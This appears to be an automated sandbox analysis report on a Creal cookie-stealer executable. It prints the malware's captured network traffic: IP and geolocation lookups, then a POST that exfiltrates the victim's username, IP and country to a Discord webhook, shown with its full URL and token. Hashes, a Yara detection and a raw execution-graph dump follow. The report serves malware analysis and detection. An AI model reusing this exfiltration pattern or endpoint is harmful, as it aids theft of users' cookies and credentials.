                                                                                                                                                                                                                                                      2023-02-14 03:50:21 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Length: 11
                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:21 GMT
                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:21 UTC6INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                                                                                                                                      Data Ascii: 84.17.52.13


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      7192.168.2.549698159.89.102.253443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC6OUTGET /jsonp/84.17.52.13 HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: geolocation-db.com
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC6INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC6INData Raw: 39 39 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 49 54 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 49 74 61 6c 79 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 33 2e 31 34 37 39 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 31 32 2e 31 30 39 37 2c 22 49 50 76 34 22 3a 22 38 34 2e 31 37 2e 35 32 2e 31 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 99callback({"country_code":"IT","country_name":"Italy","city":null,"postal":null,"latitude":43.1479,"longitude":12.1097,"IPv4":"84.17.52.13","state":null})0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      8192.168.2.549699162.159.137.232443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC6OUTPOST /api/webhooks/1074508453810274374/Nec6TaE5xRyXOeI0D3jHDg3tbo5RD1960f-6jMKlmHAllaKTQLGGzUk77rAX2YBKF_Nt HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Content-Length: 669
                                                                                                                                                                                                                                                      Host: canary.discord.com
                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC6OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 69 74 3a 20 20 2d 20 60 41 4c 46 4f 4e 53 20 7c 20 38 34 2e 31 37 2e 35 32 2e 31 33 20 28 49 74 61 6c 79 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a 20 43 6f 6f 6b 69 65 73 20 46 6f 75 6e 64
                                                                                                                                                                                                                                                      Data Ascii: {"content": ":flag_it: - `user | 84.17.52.13 (Italy)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **0** Cookies Found
                                                                                                                                                                                                                                                      2023-02-14 03:50:22 UTC7INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      CF-Ray: 7992d6d63d89367e-FRA
                                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=b51969bcac1a11edbe26cabc9eaeceaf; Expires=Sun, 13-Feb-2028 03:50:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                      x-ratelimit-reset: 1676346623
                                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nja%2FxDHtC%2FNkKX%2BKKILax1grPkPaxkXtAXjiBeKZnOfMfU9EpjCQRSqNxvSgbxmlkO64AH56rhbKpfzXinSCFDPS0gz6c0%2BgSK4yeSO3KMIILMtXnyO%2FrcwAZl9lIbqBPXeZYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=b51969bcac1a11edbe26cabc9eaeceaf7288fadfe1e6871c5e8af70062a7ef52ba4ec41e9f0d97de20bc39e7cc4d8bb5; Expires=Sun, 13-Feb-2028 03:50:22 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                                                                                                      Set-Cookie: __cfruid=c7ba20fec203bf82e8e8f2724f3feea44acfc855-1676346622; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                      Server: cloudflare


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                      9192.168.2.549700104.237.62.211443C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                      2023-02-14 03:50:24 UTC8OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                      Host: api.ipify.org
                                                                                                                                                                                                                                                      User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:24 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Content-Length: 11
                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                      Date: Tue, 14 Feb 2023 03:50:24 GMT
                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2023-02-14 03:50:24 UTC9INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                                                                                                                                      Data Ascii: 84.17.52.13


                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:04:50:02
                                                                                                                                                                                                                                                      Start date:14/02/2023
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e5ab0000
                                                                                                                                                                                                                                                      File size:13686532 bytes
                                                                                                                                                                                                                                                      MD5 hash:B051BBE6F5678560E4594B4C65CCA682
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:04:50:07
                                                                                                                                                                                                                                                      Start date:14/02/2023
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\322pVOVprx.exe
                                                                                                                                                                                                                                                      Imagebase:0x7ff6e5ab0000
                                                                                                                                                                                                                                                      File size:13686532 bytes
                                                                                                                                                                                                                                                      MD5 hash:B051BBE6F5678560E4594B4C65CCA682
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000001.00000003.338556418.0000023E967D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                      Start time:04:50:11
                                                                                                                                                                                                                                                      Start date:14/02/2023
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                      Imagebase:0x7ff627730000
                                                                                                                                                                                                                                                      File size:273920 bytes
                                                                                                                                                                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:04:50:11
                                                                                                                                                                                                                                                      Start date:14/02/2023
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff7fcd70000
                                                                                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:12.6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:18.4%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:83
                                                                                                                                                                                                                                                        execution_graph 14760 7ff6e5aba370 14761 7ff6e5aba39e 14760->14761 14762 7ff6e5aba385 14760->14762 14762->14761 14764 7ff6e5accacc 12 API calls 14762->14764 14763 7ff6e5aba3fc 14764->14763 18019 7ff6e5ad07f0 18030 7ff6e5ad6764 18019->18030 18031 7ff6e5ad6771 18030->18031 18032 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18031->18032 18033 7ff6e5ad678d 18031->18033 18032->18031 18034 7ff6e5ac9e18 __free_lconv_mon 11 API calls 18033->18034 18035 7ff6e5ad07f9 18033->18035 18034->18033 18036 7ff6e5acf788 EnterCriticalSection 18035->18036 18825 7ff6e5ad9664 18828 7ff6e5ac42f8 LeaveCriticalSection 18825->18828 18041 7ff6e5ad94de 18044 7ff6e5ad94ee 18041->18044 18045 7ff6e5ac42f8 LeaveCriticalSection 18044->18045 14966 7ff6e5ace8dc 14967 7ff6e5aceace 14966->14967 14969 7ff6e5ace91e _isindst 14966->14969 14968 7ff6e5ac4444 _findclose 11 API calls 14967->14968 14986 7ff6e5aceabe 14968->14986 14969->14967 14972 7ff6e5ace99e _isindst 14969->14972 14970 7ff6e5abad80 _wfindfirst32i64 8 API calls 14971 7ff6e5aceae9 14970->14971 14987 7ff6e5ad53b4 14972->14987 14977 7ff6e5aceafa 14978 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 14977->14978 14980 7ff6e5aceb0e 14978->14980 14984 7ff6e5ace9fb 14984->14986 15012 7ff6e5ad53f8 14984->15012 14986->14970 14988 7ff6e5ad53c3 14987->14988 14989 7ff6e5ace9bc 14987->14989 15019 7ff6e5acf788 EnterCriticalSection 14988->15019 14994 7ff6e5ad47b8 14989->14994 14995 7ff6e5ad47c1 14994->14995 14999 7ff6e5ace9d1 14994->14999 14996 7ff6e5ac4444 _findclose 11 API calls 14995->14996 14997 7ff6e5ad47c6 14996->14997 14998 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 14997->14998 14998->14999 14999->14977 15000 7ff6e5ad47e8 14999->15000 15001 7ff6e5ad47f1 15000->15001 15002 7ff6e5ace9e2 15000->15002 15003 7ff6e5ac4444 _findclose 11 API calls 15001->15003 15002->14977 15006 7ff6e5ad4818 15002->15006 15004 7ff6e5ad47f6 15003->15004 15005 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15004->15005 15005->15002 15007 7ff6e5ad4821 15006->15007 15008 7ff6e5ace9f3 15006->15008 15009 7ff6e5ac4444 _findclose 11 API calls 15007->15009 15008->14977 15008->14984 15010 7ff6e5ad4826 15009->15010 15011 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15010->15011 15011->15008 15020 7ff6e5acf788 EnterCriticalSection 15012->15020 14765 7ff6e5ac8554 14766 7ff6e5ac856d 14765->14766 14767 7ff6e5ac8564 14765->14767 14767->14766 14771 7ff6e5ac8064 14767->14771 14772 7ff6e5ac807d 14771->14772 14779 7ff6e5ac8079 14771->14779 14792 7ff6e5ad1b7c GetEnvironmentStringsW 14772->14792 14775 7ff6e5ac8096 14799 7ff6e5ac81e4 14775->14799 14776 7ff6e5ac808a 14777 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14776->14777 14777->14779 14779->14766 14784 7ff6e5ac8424 14779->14784 14781 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14782 7ff6e5ac80bd 14781->14782 14783 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14782->14783 14783->14779 14785 7ff6e5ac8447 14784->14785 14790 7ff6e5ac845e 14784->14790 14785->14766 14786 7ff6e5ace7f0 MultiByteToWideChar _fread_nolock 14786->14790 14787 7ff6e5acdd40 _findclose 11 API calls 14787->14790 14788 7ff6e5ac84d2 14789 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14788->14789 14789->14785 14790->14785 14790->14786 14790->14787 14790->14788 14791 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14790->14791 14791->14790 14793 7ff6e5ac8082 14792->14793 14794 7ff6e5ad1ba0 14792->14794 14793->14775 14793->14776 14795 7ff6e5accacc _fread_nolock 12 API calls 14794->14795 14796 7ff6e5ad1bd7 memcpy_s 14795->14796 14797 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14796->14797 14798 7ff6e5ad1bf7 FreeEnvironmentStringsW 14797->14798 14798->14793 14800 7ff6e5ac820c 14799->14800 14801 7ff6e5acdd40 _findclose 11 API calls 14800->14801 14814 7ff6e5ac8247 14801->14814 14802 7ff6e5ac824f 14803 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14802->14803 14804 7ff6e5ac809e 14803->14804 14804->14781 14805 7ff6e5ac82c9 14806 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14805->14806 14806->14804 14807 7ff6e5acdd40 _findclose 11 API calls 14807->14814 14808 7ff6e5ac82b8 14827 7ff6e5ac8300 14808->14827 14812 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14812->14802 14813 7ff6e5ac82ec 14833 7ff6e5ac9dd0 IsProcessorFeaturePresent 14813->14833 14814->14802 14814->14805 14814->14807 14814->14808 14814->14813 14816 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14814->14816 14818 7ff6e5acf924 14814->14818 14816->14814 14819 7ff6e5acf93b 14818->14819 14820 7ff6e5acf931 14818->14820 14821 7ff6e5ac4444 _findclose 11 API calls 14819->14821 14820->14819 14825 7ff6e5acf957 14820->14825 14822 7ff6e5acf943 14821->14822 14837 7ff6e5ac9db0 14822->14837 14824 7ff6e5acf94f 14824->14814 14825->14824 14826 7ff6e5ac4444 _findclose 11 API calls 14825->14826 14826->14822 14831 7ff6e5ac8305 14827->14831 14832 7ff6e5ac82c0 14827->14832 14828 7ff6e5ac832e 14830 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14828->14830 14829 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14829->14831 14830->14832 14831->14828 14831->14829 14832->14812 14834 7ff6e5ac9de3 14833->14834 14877 7ff6e5ac9ae4 14834->14877 14839 7ff6e5ac9c48 14837->14839 14840 7ff6e5ac9c73 14839->14840 14843 7ff6e5ac9ce4 14840->14843 14842 7ff6e5ac9c9a 14851 7ff6e5ac9a2c 14843->14851 14847 7ff6e5ac9d1f 14847->14842 14849 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 14850 7ff6e5ac9daf 14849->14850 14852 7ff6e5ac9a83 14851->14852 14853 7ff6e5ac9a48 GetLastError 14851->14853 14852->14847 14857 7ff6e5ac9a98 14852->14857 14854 7ff6e5ac9a58 14853->14854 14860 7ff6e5aca860 14854->14860 14858 7ff6e5ac9ab4 GetLastError SetLastError 14857->14858 14859 7ff6e5ac9acc 14857->14859 14858->14859 14859->14847 14859->14849 14861 7ff6e5aca87f FlsGetValue 14860->14861 14862 7ff6e5aca89a FlsSetValue 14860->14862 14863 7ff6e5aca894 14861->14863 14865 7ff6e5ac9a73 SetLastError 14861->14865 14864 7ff6e5aca8a7 14862->14864 14862->14865 14863->14862 14866 7ff6e5acdd40 _findclose 11 API calls 14864->14866 14865->14852 14867 7ff6e5aca8b6 14866->14867 14868 7ff6e5aca8d4 FlsSetValue 14867->14868 14869 7ff6e5aca8c4 FlsSetValue 14867->14869 14871 7ff6e5aca8f2 14868->14871 14872 7ff6e5aca8e0 FlsSetValue 14868->14872 14870 7ff6e5aca8cd 14869->14870 14873 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14870->14873 14874 7ff6e5aca3c4 _findclose 11 API calls 14871->14874 14872->14870 14873->14865 14875 7ff6e5aca8fa 14874->14875 14876 7ff6e5ac9e18 __free_lconv_mon 11 API calls 14875->14876 14876->14865 14878 7ff6e5ac9b1e _wfindfirst32i64 __scrt_get_show_window_mode 14877->14878 14879 7ff6e5ac9b46 RtlCaptureContext RtlLookupFunctionEntry 14878->14879 14880 7ff6e5ac9b80 RtlVirtualUnwind 14879->14880 14881 7ff6e5ac9bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14879->14881 14880->14881 14882 7ff6e5ac9c08 _wfindfirst32i64 14881->14882 14885 7ff6e5abad80 14882->14885 14886 7ff6e5abad89 14885->14886 14887 7ff6e5abad94 GetCurrentProcess TerminateProcess 14886->14887 14888 7ff6e5abae40 IsProcessorFeaturePresent 14886->14888 14889 7ff6e5abae58 14888->14889 14894 7ff6e5abb034 RtlCaptureContext 14889->14894 14895 7ff6e5abb04e RtlLookupFunctionEntry 14894->14895 14896 7ff6e5abb064 RtlVirtualUnwind 14895->14896 14897 7ff6e5abae6b 14895->14897 14896->14895 14896->14897 14898 7ff6e5abae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14897->14898 19107 7ff6e5ac8a50 19110 7ff6e5ac89d0 19107->19110 19117 7ff6e5acf788 EnterCriticalSection 19110->19117 17972 7ff6e5ac87b9 17973 7ff6e5ac90d8 45 API calls 17972->17973 17974 7ff6e5ac87be 17973->17974 17975 7ff6e5ac87e5 GetModuleHandleW 17974->17975 17976 7ff6e5ac882f 17974->17976 17975->17976 17981 7ff6e5ac87f2 17975->17981 17984 7ff6e5ac86bc 17976->17984 17981->17976 17998 7ff6e5ac88e0 GetModuleHandleExW 17981->17998 18004 7ff6e5acf788 EnterCriticalSection 17984->18004 17999 7ff6e5ac8914 GetProcAddress 17998->17999 18000 7ff6e5ac893d 17998->18000 18003 7ff6e5ac8926 17999->18003 18001 7ff6e5ac8942 FreeLibrary 18000->18001 18002 7ff6e5ac8949 18000->18002 18001->18002 18002->17976 18003->18000 14688 7ff6e5aba620 14689 7ff6e5aba643 14688->14689 14690 7ff6e5aba65f memcpy_s 14688->14690 14692 7ff6e5accacc 14689->14692 14693 7ff6e5accb17 14692->14693 14697 7ff6e5accadb _findclose 14692->14697 14702 7ff6e5ac4444 14693->14702 14695 7ff6e5accafe RtlAllocateHeap 14696 7ff6e5accb15 14695->14696 14695->14697 14696->14690 14697->14693 14697->14695 14699 7ff6e5ad26b0 14697->14699 14705 7ff6e5ad26f0 14699->14705 14711 7ff6e5aca798 GetLastError 14702->14711 14704 7ff6e5ac444d 14704->14696 14710 7ff6e5acf788 EnterCriticalSection 14705->14710 14712 7ff6e5aca7bc 14711->14712 14713 7ff6e5aca7d9 FlsSetValue 14711->14713 14712->14713 14726 7ff6e5aca7c9 SetLastError 14712->14726 14714 7ff6e5aca7eb 14713->14714 14713->14726 14728 7ff6e5acdd40 14714->14728 14718 7ff6e5aca818 FlsSetValue 14721 7ff6e5aca824 FlsSetValue 14718->14721 14722 7ff6e5aca836 14718->14722 14719 7ff6e5aca808 FlsSetValue 14720 7ff6e5aca811 14719->14720 14735 7ff6e5ac9e18 14720->14735 14721->14720 14741 7ff6e5aca3c4 14722->14741 14726->14704 14733 7ff6e5acdd51 _findclose 14728->14733 14729 7ff6e5acdda2 14731 7ff6e5ac4444 _findclose 10 API calls 14729->14731 14730 7ff6e5acdd86 RtlAllocateHeap 14732 7ff6e5aca7fa 14730->14732 14730->14733 14731->14732 14732->14718 14732->14719 14733->14729 14733->14730 14734 7ff6e5ad26b0 _findclose 2 API calls 14733->14734 14734->14733 14736 7ff6e5ac9e4c 14735->14736 14737 7ff6e5ac9e1d RtlReleasePrivilege 14735->14737 14736->14726 14737->14736 14738 7ff6e5ac9e38 GetLastError 14737->14738 14739 7ff6e5ac9e45 __free_lconv_mon 14738->14739 14740 7ff6e5ac4444 _findclose 9 API calls 14739->14740 14740->14736 14746 7ff6e5aca29c 14741->14746 14758 7ff6e5acf788 EnterCriticalSection 14746->14758 19266 7ff6e5ad05a0 19284 7ff6e5acf788 EnterCriticalSection 19266->19284 19288 7ff6e5aca4a0 19289 7ff6e5aca4a5 19288->19289 19293 7ff6e5aca4ba 19288->19293 19294 7ff6e5aca4c0 19289->19294 19295 7ff6e5aca502 19294->19295 19296 7ff6e5aca50a 19294->19296 19297 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19295->19297 19298 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19296->19298 19297->19296 19299 7ff6e5aca517 19298->19299 19300 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19299->19300 19301 7ff6e5aca524 19300->19301 19302 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19301->19302 19303 7ff6e5aca531 19302->19303 19304 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19303->19304 19305 7ff6e5aca53e 19304->19305 19306 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19305->19306 19307 7ff6e5aca54b 19306->19307 19308 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19307->19308 19309 7ff6e5aca558 19308->19309 19310 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19309->19310 19311 7ff6e5aca565 19310->19311 19312 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19311->19312 19313 7ff6e5aca575 19312->19313 19314 7ff6e5ac9e18 __free_lconv_mon 11 API calls 19313->19314 19315 7ff6e5aca585 19314->19315 19320 7ff6e5aca364 19315->19320 19334 7ff6e5acf788 EnterCriticalSection 19320->19334 15021 7ff6e5abb19c 15046 7ff6e5abb36c 15021->15046 15024 7ff6e5abb2e8 15159 7ff6e5abb69c IsProcessorFeaturePresent 15024->15159 15025 7ff6e5abb1b8 __scrt_acquire_startup_lock 15027 7ff6e5abb2f2 15025->15027 15028 7ff6e5abb1d6 15025->15028 15029 7ff6e5abb69c 7 API calls 15027->15029 15036 7ff6e5abb218 __scrt_release_startup_lock 15028->15036 15054 7ff6e5ac8674 15028->15054 15034 7ff6e5abb2fd __GetCurrentState 15029->15034 15032 7ff6e5abb1fb 15035 7ff6e5abb281 15063 7ff6e5abb7e8 15035->15063 15036->15035 15148 7ff6e5ac8984 15036->15148 15038 7ff6e5abb286 15066 7ff6e5ab1000 15038->15066 15043 7ff6e5abb2a9 15043->15034 15155 7ff6e5abb500 15043->15155 15166 7ff6e5abb96c 15046->15166 15049 7ff6e5abb1b0 15049->15024 15049->15025 15050 7ff6e5abb39b 15168 7ff6e5ac908c 15050->15168 15056 7ff6e5ac8687 15054->15056 15055 7ff6e5abb1f7 15055->15032 15058 7ff6e5ac8630 15055->15058 15056->15055 15211 7ff6e5abb0b0 15056->15211 15059 7ff6e5ac8635 15058->15059 15060 7ff6e5ac8666 15058->15060 15059->15060 15289 7ff6e5abb180 15059->15289 15297 7ff6e5ac4290 15059->15297 15060->15036 15321 7ff6e5abc210 15063->15321 15067 7ff6e5ab100b 15066->15067 15323 7ff6e5ab7600 15067->15323 15069 7ff6e5ab101d 15330 7ff6e5ac4f14 15069->15330 15071 7ff6e5ab367b 15337 7ff6e5ab1af0 15071->15337 15075 7ff6e5abad80 _wfindfirst32i64 8 API calls 15076 7ff6e5ab37ae 15075->15076 15153 7ff6e5abb82c GetModuleHandleW 15076->15153 15077 7ff6e5ab3699 15147 7ff6e5ab379a 15077->15147 15353 7ff6e5ab3b20 15077->15353 15079 7ff6e5ab36cb 15079->15147 15356 7ff6e5ab6990 15079->15356 15081 7ff6e5ab36e7 15082 7ff6e5ab3733 15081->15082 15083 7ff6e5ab6990 61 API calls 15081->15083 15371 7ff6e5ab6f90 15082->15371 15089 7ff6e5ab3708 __std_exception_copy 15083->15089 15085 7ff6e5ab3748 15375 7ff6e5ab19d0 15085->15375 15088 7ff6e5ab383d 15091 7ff6e5ab3868 15088->15091 15504 7ff6e5ab3280 15088->15504 15089->15082 15093 7ff6e5ab6f90 58 API calls 15089->15093 15090 7ff6e5ab19d0 121 API calls 15092 7ff6e5ab377e 15090->15092 15102 7ff6e5ab38ab 15091->15102 15386 7ff6e5ab7a30 15091->15386 15096 7ff6e5ab37c0 15092->15096 15097 7ff6e5ab3782 15092->15097 15093->15082 15096->15088 15481 7ff6e5ab3cb0 15096->15481 15468 7ff6e5ab2770 15097->15468 15098 7ff6e5ab3888 15099 7ff6e5ab389e SetDllDirectoryW 15098->15099 15100 7ff6e5ab388d 15098->15100 15099->15102 15103 7ff6e5ab2770 59 API calls 15100->15103 15400 7ff6e5ab5e40 15102->15400 15103->15147 15108 7ff6e5ab3906 15116 7ff6e5ab39c6 15108->15116 15122 7ff6e5ab3919 15108->15122 15109 7ff6e5ab37e2 15113 7ff6e5ab2770 59 API calls 15109->15113 15112 7ff6e5ab3810 15112->15088 15115 7ff6e5ab3815 15112->15115 15113->15147 15114 7ff6e5ab38c8 15114->15108 15518 7ff6e5ab5640 15114->15518 15500 7ff6e5abf2ac 15115->15500 15404 7ff6e5ab3110 15116->15404 15130 7ff6e5ab3965 15122->15130 15612 7ff6e5ab1b30 15122->15612 15123 7ff6e5ab38fc 15126 7ff6e5ab5890 FreeLibrary 15123->15126 15124 7ff6e5ab38dd 15538 7ff6e5ab55d0 15124->15538 15126->15108 15129 7ff6e5ab39fb 15133 7ff6e5ab6990 61 API calls 15129->15133 15130->15147 15616 7ff6e5ab30b0 15130->15616 15131 